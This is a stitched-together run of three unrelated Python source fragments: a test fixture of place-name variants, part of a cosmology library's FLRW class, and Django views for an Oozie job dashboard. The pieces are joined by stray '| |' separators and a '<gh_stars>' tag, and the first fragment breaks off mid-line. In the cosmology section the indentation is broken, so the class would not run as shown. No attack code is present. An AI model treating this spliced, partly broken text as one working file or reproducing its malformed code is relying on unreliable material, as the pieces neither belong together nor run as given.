language_table = [Language(i, 'Language %d' % i) for i in range(1, 13)]
# }}}
NameVar = namedtuple('name_var', ['id', 'name', 'transcription', 'simplified', 'main_form', 'comment', 'place_id', 'language_id'])# {{{
# Place-name variants keyed by place and language.  The ``comment`` fields
# describe which search pattern each row is meant to exercise; row 18 uses
# a non-Latin script with transcription and simplified alternatives.
name_var_table = [
    NameVar(1, 'Unique name 1', None, None, True, 'Testcomment', 1, 1),
    NameVar(2, 'zzzz', None, None, True, 'Matches \'z\'', 1, 2),
    NameVar(3, 'Unique name 2', None, None, False, None, 2, 3),
    NameVar(4, 'Raspberry', None, None, False, 'ends in y', 2, 4),
    NameVar(5, 'unique name 3', None, None, True, None, 3, 5),
    NameVar(6, 'Raid', None, None, True, None, 3, 6),
    NameVar(7, 'match with tee at start of word', None, None, False, None, 3, 7),
    NameVar(8, 'Starts with s', None, None, True, None, 4, 1),
    NameVar(9, 'raided', None, None, False, None, 4, 2),
    NameVar(10, 'Ends with t', None, None, True, None, 5, 3),
    NameVar(11, '3LT', None, None, False, None, 6, 4),
    NameVar(12, '3l_', None, None, False, None, 7, 5),
    NameVar(13, 'graph', None, None, True, None, 7, 6),
    NameVar(14, 'Last name', None, None, False, 'For place 8', 8, 7),
    NameVar(15, 'primarynamedoesnotmatch', 'unique transcription', None, True, 'Testcomment', 15, 2),
    NameVar(16, 'csaAwer2332', 'silly name', 'place, z, Z', True, 'Testcomment', 16, 2),
    NameVar(17, 'foobar', None, 'te, et', True, 'Starts or ends with T', 17, 4),
    NameVar(18, 'برقة', 'Barqa', 'Barca, Barqa, Barka', True, None, 18, 3),
]
# }}}
SourceType = namedtuple('source_type', ['id', 'name'])  # {{{
# The three kinds of sources, ids assigned in declaration order.
source_type_table = [
    SourceType(type_id, label)
    for type_id, label in enumerate(('unknown', 'Primary source', 'Literature'), 1)
]
# }}}
Source = namedtuple('source', ['id', 'name', 'source_type_id', 'default_confidence', 'short'])# {{{
source_table = [
Source(1, 'Source 1', 2, None, 'SRC01'),
Source(2, 'Source 2', 2, None, 'SRC02'),
Source(3, 'Source 3', 3, 'contested', 'SRC03'),
Source(4, 'Source 4', 3, 'contested', 'SRC04'),
Source(5, 'Source 5', 3, 'false', 'SRC05'),
Source(6, 'Source 6', 2, None, 'SRC06'),
Source(7, 'Source 7', 2, 'contested', 'SRC07'),
Source(8, 'Source 8', 3, 'certain', 'SRC08'),
Source(9, 'Source 9', 3, None, 'SRC09'),
Source(10, 'Source 10', 2, 'contested', 'SRC10'),
Source(11, 'Source 11', 1, None, 'SRC11'),
Source(12, 'Source 12', | |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import sys
import warnings
from math import sqrt, pi, exp, log, floor
from abc import ABCMeta, abstractmethod
import numpy as np
from .. import constants as const
from ..config import ConfigurationItem
from ..utils.misc import isiterable
from ..utils.exceptions import AstropyUserWarning
from .. import units as u
from . import parameters
# Originally authored by <NAME> (<EMAIL>),
# and modified by <NAME> (<EMAIL>) and <NAME> (<EMAIL>).
# Many of these adapted from Hogg 1999, astro-ph/9905116
# and Linder 2003, PRL 90, 91301
__all__ = ["FLRW", "LambdaCDM", "FlatLambdaCDM", "wCDM", "FlatwCDM",
"Flatw0waCDM", "w0waCDM", "wpwaCDM", "w0wzCDM", "get_current",
"set_current", "WMAP5", "WMAP7", "WMAP9", "Planck13"]
__doctest_requires__ = {'*': ['scipy.integrate']}
# Constants
# Mpc in km
Mpc_km = (1 * u.Mpc).to(u.km)
# One arcsecond / arcminute expressed in radians
arcsec_in_radians = 1 / 3600. * pi / 180
arcmin_in_radians = 1 / 60. * pi / 180
# Radiation parameter over c^2 in cgs
a_B_c2 = 4 * const.sigma_sb.cgs.value / const.c.cgs.value ** 3
# Boltzmann constant in eV / K
kB_evK = const.k_B.decompose().to(u.eV / u.K)
# Configuration entry selecting the cosmology returned by get_current()
# when the user has not called set_current() explicitly.
DEFAULT_COSMOLOGY = ConfigurationItem(
    'default_cosmology', 'no_default',
    'The default cosmology to use. Note this is only read on import, '
    'so changing this value at runtime has no effect.')
class CosmologyError(Exception):
    """Exception raised when a cosmological computation cannot proceed."""
    pass
class Cosmology(object):
    """ Placeholder base class for when a more general Cosmology class is
    implemented; FLRW and its subclasses derive from it. """
    pass
class FLRW(Cosmology):
""" A class describing an isotropic and homogeneous
(Friedmann-Lemaitre-Robertson-Walker) cosmology.
This is an abstract base class -- you can't instantiate
examples of this class, but must work with one of its
subclasses such as `LambdaCDM` or `wCDM`.
Parameters
----------
H0 : float or scalar astropy.units.Quantity
Hubble constant at z = 0. If a float, must be in [km/sec/Mpc]
Om0 : float
Omega matter: density of non-relativistic matter in units of the
critical density at z=0.
Ode0 : float
Omega dark energy: density of dark energy in units of the critical
density at z=0.
Tcmb0 : float or scalar astropy.units.Quantity
Temperature of the CMB z=0. If a float, must be in [K]. Default: 2.725.
Setting this to zero will turn off both photons and neutrinos (even
massive ones)
Neff : float
Effective number of Neutrino species. Default 3.04.
m_nu : astropy.units.Quantity
Mass of each neutrino species. If this is a scalar Quantity, then all
neutrino species are assumed to have that mass. Otherwise, the mass of
each species. The actual number of neutrino species (and hence the
number of elements of m_nu if it is not scalar) must be the floor of
Neff. Usually this means you must provide three neutrino masses unless
you are considering something like a sterile neutrino.
name : str
Optional name for this cosmological object.
Notes
-----
Class instances are static -- you can't change the values
of the parameters. That is, all of the attributes above are
read only.
"""
__metaclass__ = ABCMeta
    def __init__(self, H0, Om0, Ode0, Tcmb0=2.725, Neff=3.04,
                 m_nu=u.Quantity(0.0, u.eV), name=None):
        """Set up the cosmology; see the class docstring for the meaning
        of each parameter.

        Raises
        ------
        ValueError
            If Om0 or Neff is negative, H0 or Tcmb0 is a non-scalar
            Quantity, m_nu is not a Quantity, a neutrino mass is negative,
            or the number of neutrino masses does not match floor(Neff).
        """
        # all densities are in units of the critical density
        self._Om0 = float(Om0)
        if self._Om0 < 0.0:
            raise ValueError("Matter density can not be negative")
        self._Ode0 = float(Ode0)
        self._Neff = float(Neff)
        if self._Neff < 0.0:
            raise ValueError("Effective number of neutrinos can "
                             "not be negative")
        self.name = name
        # Tcmb may have units
        if isinstance(Tcmb0, u.Quantity):
            if not Tcmb0.isscalar:
                raise ValueError("Tcmb0 is a non-scalar quantity")
            self._Tcmb0 = Tcmb0.to(u.K)
        else:
            # Bare float is interpreted as Kelvin
            self._Tcmb0 = float(Tcmb0) * u.K
        # Hubble parameter at z=0, km/s/Mpc
        if isinstance(H0, u.Quantity):
            if not H0.isscalar:
                raise ValueError("H0 is a non-scalar quantity")
            self._H0 = H0.to(u.km / u.s / u.Mpc)
        else:
            self._H0 = float(H0) * u.km / u.s / u.Mpc
        # 100 km/s/Mpc * h = H0 (so h is dimensionless)
        self._h = self._H0.value / 100.
        # Hubble distance
        self._hubble_distance = (const.c / self._H0).to(u.Mpc)
        # H0 in s^-1
        H0_s = self._H0.to(1.0 / u.s)
        # Hubble time
        self._hubble_time = (1. / H0_s).to(u.Gyr)
        # critical density at z=0 (grams per cubic cm)
        self._critical_density0 = (3. * H0_s ** 2 /
                                   (8. * pi * const.G.cgs)).cgs
        # Load up neutrino masses.
        self._nneutrinos = floor(self._Neff)
        # We are going to share Neff between the neutrinos equally.
        # In detail this is not correct, but it is a standard assumption
        # because properly calculating it is a) complicated b) depends
        # on the details of the massive neutrinos (e.g., their weak
        # interactions, which could be unusual if one is considering sterile
        # neutrinos)
        self._massivenu = False
        if self._nneutrinos > 0 and self._Tcmb0.value > 0:
            self._neff_per_nu = self._Neff / self._nneutrinos
            if not isinstance(m_nu, u.Quantity):
                raise ValueError("m_nu must be a Quantity")
            m_nu = m_nu.to(u.eV, equivalencies=u.mass_energy())
            # Now, figure out if we have massive neutrinos to deal with,
            # and, if so, get the right number of masses
            # It is worth the effort to keep track of massless ones separately
            # (since they are quite easy to deal with, and a common use case
            # is to set only one neutrino to have mass)
            if m_nu.isscalar:
                # Assume all neutrinos have the same mass
                if m_nu.value == 0:
                    self._nmasslessnu = self._nneutrinos
                    self._nmassivenu = 0
                else:
                    self._massivenu = True
                    self._nmasslessnu = 0
                    self._nmassivenu = self._nneutrinos
                    self._massivenu_mass = (m_nu.value *
                                            np.ones(self._nneutrinos))
            else:
                # Make sure we have the right number of masses
                # -unless- they are massless, in which case we cheat a little
                if m_nu.value.min() < 0:
                    raise ValueError("Invalid (negative) neutrino mass"
                                     " encountered")
                if m_nu.value.max() == 0:
                    self._nmasslessnu = self._nneutrinos
                    self._nmassivenu = 0
                else:
                    self._massivenu = True
                    if len(m_nu) != self._nneutrinos:
                        raise ValueError("Unexpected number of neutrino masses")
                    # Segregate out the massless ones
                    try:
                        # Numpy < 1.6 doesn't have count_nonzero
                        self._nmasslessnu = np.count_nonzero(m_nu.value == 0)
                    except AttributeError:
                        self._nmasslessnu = len(np.nonzero(m_nu.value == 0)[0])
                    self._nmassivenu = self._nneutrinos - self._nmasslessnu
                    w = np.nonzero(m_nu.value > 0)[0]
                    self._massivenu_mass = m_nu[w]
        # Compute photon density, Tcmb, neutrino parameters
        # Tcmb0=0 removes both photons and neutrinos, is handled
        # as a special case for efficiency
        if self._Tcmb0.value > 0:
            # Compute photon density from Tcmb
            self._Ogamma0 = a_B_c2 * self._Tcmb0.value ** 4 /\
                self._critical_density0.value
            # Compute Neutrino temperature
            # The constant in front is (4/11)^1/3 -- see any
            # cosmology book for an explanation -- for example,
            # Weinberg 'Cosmology' p 154 eq (3.1.21)
            self._Tnu0 = 0.7137658555036082 * self._Tcmb0
            # Compute Neutrino Omega and total relativistic component
            # for massive neutrinos
            if self._massivenu:
                nu_y = self._massivenu_mass / (kB_evK * self._Tnu0)
                self._nu_y = nu_y.value
                self._Onu0 = self._Ogamma0 * self.nu_relative_density(0)
            else:
                # This case is particularly simple, so do it directly
                # The 0.2271... is 7/8 (4/11)^(4/3) -- the temperature
                # bit ^4 (blackbody energy density) times 7/8 for
                # FD vs. BE statistics.
                self._Onu0 = 0.22710731766 * self._Neff * self._Ogamma0
        else:
            self._Ogamma0 = 0.0
            self._Tnu0 = u.Quantity(0.0, u.K)
            self._Onu0 = 0.0
        # Compute curvature density
        self._Ok0 = 1.0 - self._Om0 - self._Ode0 - self._Ogamma0 - self._Onu0
def _namelead(self):
""" Helper function for constructing __repr__"""
if self.name is None:
return "{0:s}(".format(self.__class__.__name__)
else:
return "{0:s}(name=\"{1:s}\", ".format(self.__class__.__name__,
self.name)
def __repr__(self):
retstr = "{0:s}H0={1:.3g}, Om0={2:.3g}, Ode0={3:.3g}, "\
"Tcmb0={4:.4g}, Neff={5:.3g}, m_nu={6:s})"
return retstr.format(self._namelead(), self._H0, self._Om0, self._Ode0,
self._Tcmb0, self._Neff, self.m_nu)
    # Set up a set of properties for H0, Om0, Ode0, Ok0, etc. for user access.
    # Note that we don't let these be set (so, obj.Om0 = value fails)

    @property
    def H0(self):
        """ Return the Hubble constant as an astropy.units.Quantity at z=0"""
        return self._H0

    @property
    def Om0(self):
        """ Omega matter; matter density/critical density at z=0"""
        return self._Om0

    @property
    def Ode0(self):
        """ Omega dark energy; dark energy density/critical density at z=0"""
        return self._Ode0

    @property
    def Ok0(self):
        """ Omega curvature; the effective curvature density/critical density
        at z=0"""
        return self._Ok0

    @property
    def Tcmb0(self):
        """ Temperature of the CMB as astropy.units.Quantity at z=0"""
        return self._Tcmb0

    @property
    def Tnu0(self):
        """ Temperature of the neutrino background as astropy.units.Quantity at z=0"""
        return self._Tnu0

    @property
    def Neff(self):
        """ Number of effective neutrino species"""
        return self._Neff

    @property
    def has_massive_nu(self):
        """ Does this cosmology have at least one massive neutrino species?"""
        # Tnu0 == 0 means there is no neutrino background at all, so any
        # nominal masses are irrelevant.
        if self._Tnu0.value == 0:
            return False
        return self._massivenu
@property
def m_nu(self):
""" Mass of neutrino species"""
if self._Tnu0.value == 0:
return None
if not self._massivenu:
| |
<gh_stars>0
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging
import os
import re
import time
from django.forms.formsets import formset_factory
from django.http import HttpResponse
from django.utils.functional import wraps
from django.utils.translation import ugettext as _
from django.core.urlresolvers import reverse
from django.shortcuts import redirect
from desktop.lib.django_util import render, encode_json_for_js
from desktop.lib.exceptions_renderable import PopupException
from desktop.lib.i18n import smart_str
from desktop.lib.rest.http_client import RestException
from desktop.lib.view_util import format_duration_in_millis
from desktop.log.access import access_warn
from liboozie.oozie_api import get_oozie
from liboozie.submittion import Submission
from oozie.conf import OOZIE_JOBS_COUNT
from oozie.forms import RerunForm, ParameterForm, RerunCoordForm,\
RerunBundleForm
from oozie.models import History, Job, Workflow, utc_datetime_format, Bundle,\
Coordinator, get_link
from oozie.settings import DJANGO_APPS
LOG = logging.getLogger(__name__)

# Cap on coordinator actions returned to the dashboard unless the client
# passes show_all_actions=true (see list_oozie_coordinator).
MAX_COORD_ACTIONS = 250
"""
Permissions:
A Workflow/Coordinator/Bundle can:
* be accessed only by its owner or a superuser or by a user with 'dashboard_jobs_access' permissions
* be submitted/modified only by its owner or a superuser
Permissions checking happens by calling:
* check_job_access_permission()
* check_job_edition_permission()
"""
def manage_oozie_jobs(request, job_id, action):
  """Apply a control action (start, suspend, kill, ...) to an Oozie job.

  Only POST is accepted; the caller must own the job or be a superuser.
  Returns a JSON payload: {'status': 0, 'data': ...} on success, or
  {'status': -1, 'data': <error message>} when the Oozie call fails.
  """
  if request.method != 'POST':
    raise PopupException(_('Use a POST request to manage an Oozie job.'))

  job = check_job_access_permission(request, job_id)
  check_job_edition_permission(job, request.user)

  response = {'status': -1, 'data': ''}

  try:
    response['data'] = get_oozie(request.user).job_control(job_id, action)
    response['status'] = 0
    if 'notification' in request.POST:
      request.info(_(request.POST.get('notification')))
  except RestException as ex:  # 'as' form: valid on Python 2.6+ and Python 3
    response['data'] = _("Error performing %s on Oozie job %s: %s.") % (action, job_id, ex.message)

  return HttpResponse(json.dumps(response), mimetype="application/json")
def show_oozie_error(view_func):
  """Decorator converting Oozie REST errors into a user-facing PopupException."""
  def decorate(request, *args, **kwargs):
    try:
      return view_func(request, *args, **kwargs)
    except RestException as ex:  # 'as' form: valid on Python 2.6+ and Python 3
      # The Oozie server puts the root cause in a response header.
      detail = ex._headers.get('oozie-error-message', ex)
      if 'Max retries exceeded with url' in str(detail):
        detail = '%s: %s' % (_('The Oozie server is not running'), detail)
      raise PopupException(_('An error occurred with Oozie.'), detail=detail)
  return wraps(view_func)(decorate)
@show_oozie_error
def list_oozie_workflows(request):
  """List Oozie workflow jobs as JSON (?format=json) or the dashboard page.

  Users without 'dashboard_jobs_access' only see their own jobs.
  """
  kwargs = {'cnt': OOZIE_JOBS_COUNT.get(),}
  if not has_dashboard_jobs_access(request.user):
    # Restrict the listing to the requesting user's own jobs.
    kwargs['user'] = request.user.username

  workflows = get_oozie(request.user).get_workflows(**kwargs)

  if request.GET.get('format') == 'json':
    just_sla = request.GET.get('justsla') == 'true'
    # 'running' and 'completed' are mutually exclusive filters: look the
    # parameter up once and pick a single branch.
    job_type = request.GET.get('type')
    if job_type == 'running':
      json_jobs = split_oozie_jobs(request.user, workflows.jobs)['running_jobs']
    elif job_type == 'completed':
      json_jobs = split_oozie_jobs(request.user, workflows.jobs)['completed_jobs']
    else:
      json_jobs = workflows.jobs
    return HttpResponse(encode_json_for_js(massaged_oozie_jobs_for_json(json_jobs, request.user, just_sla)), mimetype="application/json")

  return render('dashboard/list_oozie_workflows.mako', request, {
    'user': request.user,
    'jobs': split_oozie_jobs(request.user, workflows.jobs),
    'has_job_edition_permission': has_job_edition_permission,
  })
@show_oozie_error
def list_oozie_coordinators(request):
  """List Oozie coordinator jobs as JSON (?format=json) or the dashboard page.

  Users without 'dashboard_jobs_access' only see their own jobs.
  """
  kwargs = {'cnt': OOZIE_JOBS_COUNT.get(),}
  if not has_dashboard_jobs_access(request.user):
    # Restrict the listing to the requesting user's own jobs.
    kwargs['user'] = request.user.username

  coordinators = get_oozie(request.user).get_coordinators(**kwargs)

  if request.GET.get('format') == 'json':
    # 'running' and 'completed' are mutually exclusive filters: look the
    # parameter up once and pick a single branch.
    job_type = request.GET.get('type')
    if job_type == 'running':
      json_jobs = split_oozie_jobs(request.user, coordinators.jobs)['running_jobs']
    elif job_type == 'completed':
      json_jobs = split_oozie_jobs(request.user, coordinators.jobs)['completed_jobs']
    else:
      json_jobs = coordinators.jobs
    return HttpResponse(json.dumps(massaged_oozie_jobs_for_json(json_jobs, request.user)).replace('\\\\', '\\'), mimetype="application/json")

  return render('dashboard/list_oozie_coordinators.mako', request, {
    'jobs': split_oozie_jobs(request.user, coordinators.jobs),
    'has_job_edition_permission': has_job_edition_permission,
  })
@show_oozie_error
def list_oozie_bundles(request):
  """List Oozie bundle jobs as JSON (?format=json) or the dashboard page.

  Users without 'dashboard_jobs_access' only see their own jobs.
  """
  kwargs = {'cnt': OOZIE_JOBS_COUNT.get(),}
  if not has_dashboard_jobs_access(request.user):
    # Restrict the listing to the requesting user's own jobs.
    kwargs['user'] = request.user.username

  bundles = get_oozie(request.user).get_bundles(**kwargs)

  if request.GET.get('format') == 'json':
    # 'running' and 'completed' are mutually exclusive filters: look the
    # parameter up once and pick a single branch.
    job_type = request.GET.get('type')
    if job_type == 'running':
      json_jobs = split_oozie_jobs(request.user, bundles.jobs)['running_jobs']
    elif job_type == 'completed':
      json_jobs = split_oozie_jobs(request.user, bundles.jobs)['completed_jobs']
    else:
      json_jobs = bundles.jobs
    return HttpResponse(json.dumps(massaged_oozie_jobs_for_json(json_jobs, request.user)).replace('\\\\', '\\'), mimetype="application/json")

  return render('dashboard/list_oozie_bundles.mako', request, {
    'jobs': split_oozie_jobs(request.user, bundles.jobs),
    'has_job_edition_permission': has_job_edition_permission,
  })
@show_oozie_error
def list_oozie_workflow(request, job_id):
  """Show a single Oozie workflow, as JSON (?format=json) or as a page."""
  oozie_workflow = check_job_access_permission(request, job_id)

  # Optional parent coordinator/bundle context, each permission-checked too.
  oozie_coordinator = None
  if request.GET.get('coordinator_job_id'):
    oozie_coordinator = check_job_access_permission(request, request.GET.get('coordinator_job_id'))

  oozie_bundle = None
  if request.GET.get('bundle_job_id'):
    oozie_bundle = check_job_access_permission(request, request.GET.get('bundle_job_id'))

  if oozie_coordinator is not None:
    setattr(oozie_workflow, 'oozie_coordinator', oozie_coordinator)
  if oozie_bundle is not None:
    setattr(oozie_workflow, 'oozie_bundle', oozie_bundle)

  # Cross-reference the Hue design that submitted this job: first via the
  # History table, falling back to the submitted Oozie configuration.
  history = History.cross_reference_submission_history(request.user, job_id)
  hue_coord = history and history.get_coordinator() or History.get_coordinator_from_config(oozie_workflow.conf_dict)
  hue_workflow = (hue_coord and hue_coord.workflow) or (history and history.get_workflow()) or History.get_workflow_from_config(oozie_workflow.conf_dict)

  # The caller must be allowed to read the referenced Hue designs as well.
  if hue_coord and hue_coord.workflow: Job.objects.can_read_or_exception(request, hue_coord.workflow.id)
  if hue_workflow: Job.objects.can_read_or_exception(request, hue_workflow.id)

  parameters = oozie_workflow.conf_dict.copy()

  for action in oozie_workflow.actions:
    action.oozie_coordinator = oozie_coordinator
    action.oozie_bundle = oozie_bundle

  if hue_workflow:
    workflow_graph = hue_workflow.gen_status_graph(oozie_workflow)
    full_node_list = hue_workflow.node_list
  else:
    # No Hue design available; rebuild the graph from the workflow XML.
    workflow_graph, full_node_list = Workflow.gen_status_graph_from_xml(request.user, oozie_workflow)

  if request.GET.get('format') == 'json':
    return_obj = {
      'id': oozie_workflow.id,
      'status': oozie_workflow.status,
      'progress': oozie_workflow.get_progress(full_node_list),
      'graph': workflow_graph,
      'log': oozie_workflow.log,
      'actions': massaged_workflow_actions_for_json(oozie_workflow.get_working_actions(), oozie_coordinator, oozie_bundle)
    }
    return HttpResponse(encode_json_for_js(return_obj), mimetype="application/json")

  oozie_slas = []
  if oozie_workflow.has_sla:
    # SLA information is only exposed by the v2 Oozie API.
    api = get_oozie(request.user, api_version="v2")
    params = {
      'id': oozie_workflow.id,
      'parent_id': oozie_workflow.id
    }
    oozie_slas = api.get_oozie_slas(**params)

  return render('dashboard/list_oozie_workflow.mako', request, {
    'history': history,
    'oozie_workflow': oozie_workflow,
    'oozie_coordinator': oozie_coordinator,
    'oozie_bundle': oozie_bundle,
    'oozie_slas': oozie_slas,
    'hue_workflow': hue_workflow,
    'hue_coord': hue_coord,
    'parameters': parameters,
    'has_job_edition_permission': has_job_edition_permission,
    'workflow_graph': workflow_graph
  })
@show_oozie_error
def list_oozie_coordinator(request, job_id):
  """Show a single Oozie coordinator, as JSON (?format=json) or as a page."""
  oozie_coordinator = check_job_access_permission(request, job_id)

  # Cross reference the submission history (if any)
  coordinator = None
  try:
    coordinator = History.objects.get(oozie_job_id=job_id).job.get_full_node()
  except History.DoesNotExist:
    pass

  oozie_bundle = None
  if request.GET.get('bundle_job_id'):
    oozie_bundle = check_job_access_permission(request, request.GET.get('bundle_job_id'))

  show_all_actions = request.GET.get('show_all_actions') == 'true'

  if request.GET.get('format') == 'json':
    actions = massaged_coordinator_actions_for_json(oozie_coordinator, oozie_bundle)
    # Cap the action list unless the client explicitly asked for all of it.
    if not show_all_actions:
      actions = actions[:MAX_COORD_ACTIONS]

    return_obj = {
      'id': oozie_coordinator.id,
      'status': oozie_coordinator.status,
      'progress': oozie_coordinator.get_progress(),
      'nextTime': format_time(oozie_coordinator.nextMaterializedTime),
      'endTime': format_time(oozie_coordinator.endTime),
      'log': oozie_coordinator.log,
      'actions': actions,
      'show_all_actions': show_all_actions
    }
    return HttpResponse(encode_json_for_js(return_obj), mimetype="application/json")

  oozie_slas = []
  if oozie_coordinator.has_sla:
    # SLA information is only exposed by the v2 Oozie API.
    api = get_oozie(request.user, api_version="v2")
    params = {
      'id': oozie_coordinator.id,
      'parent_id': oozie_coordinator.id
    }
    oozie_slas = api.get_oozie_slas(**params)

  return render('dashboard/list_oozie_coordinator.mako', request, {
    'oozie_coordinator': oozie_coordinator,
    'oozie_slas': oozie_slas,
    'coordinator': coordinator,
    'oozie_bundle': oozie_bundle,
    'has_job_edition_permission': has_job_edition_permission,
    'show_all_actions': show_all_actions,
    'MAX_COORD_ACTIONS': MAX_COORD_ACTIONS
  })
@show_oozie_error
def list_oozie_bundle(request, job_id):
  """Show a single Oozie bundle, as JSON (?format=json) or as a page."""
  oozie_bundle = check_job_access_permission(request, job_id)

  # Cross reference the submission history (if any)
  bundle = None
  try:
    bundle = History.objects.get(oozie_job_id=job_id).job.get_full_node()
  except History.DoesNotExist:
    pass

  if request.GET.get('format') != 'json':
    return render('dashboard/list_oozie_bundle.mako', request, {
      'oozie_bundle': oozie_bundle,
      'bundle': bundle,
      'has_job_edition_permission': has_job_edition_permission,
    })

  payload = {
    'id': oozie_bundle.id,
    'status': oozie_bundle.status,
    'progress': oozie_bundle.get_progress(),
    'endTime': format_time(oozie_bundle.endTime),
    'log': oozie_bundle.log,
    'actions': massaged_bundle_actions_for_json(oozie_bundle)
  }
  return HttpResponse(json.dumps(payload).replace('\\\\', '\\'), mimetype="application/json")
@show_oozie_error
def list_oozie_workflow_action(request, action):
    """Dashboard page for a single Oozie workflow action.

    ``action`` is the Oozie action id (``<workflow-id>@<action-name>``);
    access is checked on the parent workflow. Optional ``coordinator_job_id``
    and ``bundle_job_id`` GET parameters attach the enclosing coordinator or
    bundle so the page can render its breadcrumb context.
    """
    try:
        # The parameter is rebound from the action id string to the API object.
        action = get_oozie(request.user).get_action(action)
        workflow = check_job_access_permission(request, action.id.split('@')[0])
    except RestException, ex:
        raise PopupException(_("Error accessing Oozie action %s.") % (action,), detail=ex.message)
    oozie_coordinator = None
    if request.GET.get('coordinator_job_id'):
        oozie_coordinator = check_job_access_permission(request, request.GET.get('coordinator_job_id'))
    oozie_bundle = None
    if request.GET.get('bundle_job_id'):
        oozie_bundle = check_job_access_permission(request, request.GET.get('bundle_job_id'))
    # Attach parents so templates can link back up the job hierarchy.
    workflow.oozie_coordinator = oozie_coordinator
    workflow.oozie_bundle = oozie_bundle
    return render('dashboard/list_oozie_workflow_action.mako', request, {
        'action': action,
        'workflow': workflow,
        'oozie_coordinator': oozie_coordinator,
        'oozie_bundle': oozie_bundle,
    })
@show_oozie_error
def list_oozie_info(request):
    """Render the Oozie server information page: instrumentation counters,
    server configuration and overall server status."""
    api = get_oozie(request.user)
    context = {
        'instrumentation': api.get_instrumentation(),
        'configuration': api.get_configuration(),
        'oozie_status': api.get_oozie_status(),
    }
    return render('dashboard/list_oozie_info.mako', request, context)
@show_oozie_error
def list_oozie_sla(request):
    """Dashboard page for Oozie SLA information (requires the v2 API).

    POST filters SLA records by job id or application name, optionally
    restricted to a nominal start/end window; plain GET shows an empty
    listing. With ``?format=json`` the matching SLAs are returned as JSON
    for the AJAX table.
    """
    api = get_oozie(request.user, api_version="v2")
    if request.method == 'POST':
        params = {}
        # NOTE(review): job_name is None when the field is absent, which would
        # make re.match raise TypeError -- presumably the form always posts it.
        job_name = request.POST.get('job_name')
        # Oozie job ids end in '-oozie-oozi-' plus W/C/B (workflow/coordinator/
        # bundle); anything else is treated as an application name.
        if re.match('.*-oozie-oozi-[WCB]', job_name):
            params['id'] = job_name
            params['parent_id'] = job_name
        else:
            params['app_name'] = job_name
        if 'useDates' in request.POST:
            if request.POST.get('start'):
                params['nominal_start'] = request.POST.get('start')
            if request.POST.get('end'):
                params['nominal_end'] = request.POST.get('end')
        oozie_slas = api.get_oozie_slas(**params)
    else:
        oozie_slas = []  # or get latest?
    # NOTE(review): request.REQUEST (merged GET/POST) is deprecated in modern
    # Django; request.GET would presumably suffice here -- confirm.
    if request.REQUEST.get('format') == 'json':
        massaged_slas = []
        for sla in oozie_slas:
            massaged_slas.append(massaged_sla_for_json(sla, request))
        return HttpResponse(json.dumps({'oozie_slas': massaged_slas}), content_type="text/json")
    return render('dashboard/list_oozie_sla.mako', request, {
        'oozie_slas': oozie_slas
    })
def massaged_sla_for_json(sla, request):
    """Project a raw Oozie SLA record onto the flat dict consumed by the
    dashboard JSON endpoint, adding a dashboard link for the job id."""
    passthrough = (
        'slaStatus', 'id', 'appType', 'appName', 'user', 'nominalTime',
        'expectedStart', 'actualStart', 'expectedEnd', 'actualEnd',
        'jobStatus', 'expectedDuration', 'actualDuration', 'lastModified',
    )
    massaged_sla = dict((field, sla[field]) for field in passthrough)
    massaged_sla['appUrl'] = get_link(sla['id'])
    return massaged_sla
@show_oozie_error
def rerun_oozie_job(request, job_id, app_path):
    """Re-run an Oozie workflow, retrying failed nodes or skipping chosen ones.

    GET returns the rerun dialog (popup HTML wrapped in JSON); POST validates
    the rerun + parameters forms, resubmits the job and redirects back to the
    workflow dashboard page. Invalid POSTs fall through and re-render the
    popup with the form errors attached.
    """
    ParametersFormSet = formset_factory(ParameterForm, extra=0)
    oozie_workflow = check_job_access_permission(request, job_id)
    check_job_edition_permission(oozie_workflow, request.user)
    if request.method == 'POST':
        rerun_form = RerunForm(request.POST, oozie_workflow=oozie_workflow)
        params_form = ParametersFormSet(request.POST)
        # Both forms must validate before resubmitting.
        if sum([rerun_form.is_valid(), params_form.is_valid()]) == 2:
            args = {}
            if request.POST['rerun_form_choice'] == 'fail_nodes':
                args['fail_nodes'] = 'true'
            else:
                args['skip_nodes'] = ','.join(rerun_form.cleaned_data['skip_nodes'])
            args['deployment_dir'] = app_path
            # Oozie job properties entered in the parameters formset.
            mapping = dict([(param['name'], param['value']) for param in params_form.cleaned_data])
            _rerun_workflow(request, job_id, args, mapping)
            request.info(_('Workflow re-running.'))
            return redirect(reverse('oozie:list_oozie_workflow', kwargs={'job_id': job_id}))
        else:
            # NOTE(review): %-interpolation happens inside _() so the message is
            # not translatable as a template -- presumably accepted here.
            request.error(_('Invalid submission form: %s %s' % (rerun_form.errors, params_form.errors)))
    else:
        rerun_form = RerunForm(oozie_workflow=oozie_workflow)
        initial_params = ParameterForm.get_initial_params(oozie_workflow.conf_dict)
        params_form = ParametersFormSet(initial=initial_params)
    popup = render('dashboard/rerun_job_popup.mako', request, {
        'rerun_form': rerun_form,
        'params_form': params_form,
        'action': reverse('oozie:rerun_oozie_job', kwargs={'job_id': job_id, 'app_path': app_path}),
    }, force_template=True).content
    return HttpResponse(json.dumps(popup), mimetype="application/json")
def _rerun_workflow(request, oozie_id, run_args, mapping):
    """Submit a workflow rerun to Oozie.

    ``run_args`` are keyword arguments for Submission.rerun (fail_nodes /
    skip_nodes / deployment_dir) and ``mapping`` the job properties. Wraps
    RestException in a user-facing PopupException.
    """
    try:
        submission = Submission(user=request.user, fs=request.fs, jt=request.jt, properties=mapping, oozie_id=oozie_id)
        job_id = submission.rerun(**run_args)
        return job_id
    except RestException, ex:
        # Prefer the Oozie error header when present, else the exception itself.
        raise PopupException(_("Error re-running workflow %s.") % (oozie_id,),
                             detail=ex._headers.get('oozie-error-message', ex))
@show_oozie_error
def rerun_oozie_coordinator(request, job_id, app_path):
    """Re-run selected actions of an Oozie coordinator.

    GET returns the rerun dialog (popup HTML wrapped in JSON); POST validates
    the forms, resubmits the chosen coordinator actions and redirects back to
    the coordinator dashboard page.
    """
    oozie_coordinator = check_job_access_permission(request, job_id)
    check_job_edition_permission(oozie_coordinator, request.user)
    ParametersFormSet = formset_factory(ParameterForm, extra=0)
